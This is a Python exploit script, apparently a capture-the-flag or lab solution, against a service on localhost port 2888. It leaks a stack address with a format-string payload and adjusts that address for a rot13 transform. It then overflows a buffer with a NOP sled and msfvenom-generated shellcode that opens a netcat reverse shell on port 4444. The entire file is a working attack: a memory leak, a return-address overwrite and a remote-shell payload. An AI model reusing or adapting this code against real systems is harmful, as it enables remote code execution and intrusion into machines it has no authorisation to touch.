exploit.py

import telnetlib
import struct
import string
import binascii

# rot13 a string
def rot13(text):
    rot13 = string.maketrans(
        "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz",
        "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
    return string.translate(text, rot13)

# the buffer gets rot13'd before the overflow, 
# so we need to rot13 each alpha character in the address. 
def rot_address(address):
    r_addr_str = ""
    addr_str = hex(address)
    addr_str = addr_str.lstrip("0x")
    for i in range(0, len(addr_str), 2):
        ch = chr(int(addr_str[i] + addr_str[i+1], 16))
        if ch.isalpha():
            r_addr_str += hex(ord(rot13(ch)[0])).lstrip("0x")
        else:
            r_addr_str += addr_str[i] + addr_str[i+1]
    return int(r_addr_str, 16)


host = "127.0.0.1"
port = 2888

# sudo msfvenom -p linux/x64/exec CMD="nc -c /bin/sh <ip> 4444" --format python  -v SC --bad-chars "\x0a"
SC =  ""
SC += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68"
SC += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6"
SC += "\x52\xe8\x1d\x00\x00\x00\x6e\x63\x20\x2d\x63\x20\x2f"
SC += "\x62\x69\x6e\x2f\x73\x68\x20\x31\x32\x37\x2e\x30\x2e"
SC += "\x30\x2e\x31\x20\x34\x34\x34\x34\x00\x56\x57\x48\x89"
SC += "\xe6\x0f\x05"


# format string
leak = "%llx " * 20
leak += "\r\n"

session = telnetlib.Telnet(host, port, timeout=1)

# send the format string
session.write(leak.encode("ascii"))
# read the data
session.read_until("remaining.\n")
txt = session.read_until("\n")
addrs = txt.split(" ")

# save the leaked stack address
ADDR = rot_address(int("0x" + addrs[0], 16))

# pad the payload with nops
PAYLOAD = "\x90" * (263 - len(SC))
PAYLOAD += SC

# jump to the leaked stack address that lands on the nop sled... not super reliable, but it works.
PAYLOAD += struct.pack("<Q", ADDR) 
PAYLOAD += "\r\n"

session.write(PAYLOAD)

session.close()